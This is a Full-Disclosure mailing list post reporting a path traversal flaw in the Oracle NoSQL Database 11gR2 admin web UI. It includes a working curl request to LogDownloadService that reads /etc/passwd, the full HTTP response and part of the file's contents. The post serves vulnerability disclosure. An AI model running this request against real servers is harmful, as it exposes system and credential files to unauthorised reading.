Hi List, I don't know if this worth anything, because the manual says:
"Oracle NoSQL Database is intended to be installed in a secure location where physical and network access to the store is restricted to trusted users. For this reason, at this time Oracle NoSQL Database's security model is designed to prevent accidental access to the data. It is not designed to prevent malicious access or denial-of-service attacks." Anyway, here is the deal: +++ $ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd * About to connect() to 127.0.0.1 port 5001 (#0) * Trying 127.0.0.1... connected * Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0) > GET > /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd > HTTP/1.1 > User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o > zlib/1.2.3.4 libidn/1.18 > Host: 127.0.0.1:5001 > Accept: */* > < HTTP/1.1 200 OK < Content-Type: application/octet-stream < Content-Length: 1668 < Content-Disposition: attachment; filename="../../../../../../../../../../../../../../../etc/passwd" < Server: Jetty(7.4.0.v20110414) < root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh [...] +++ Software: Oracle NoSQL Database 11gR2.1.1.100 Regards, Buherator _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
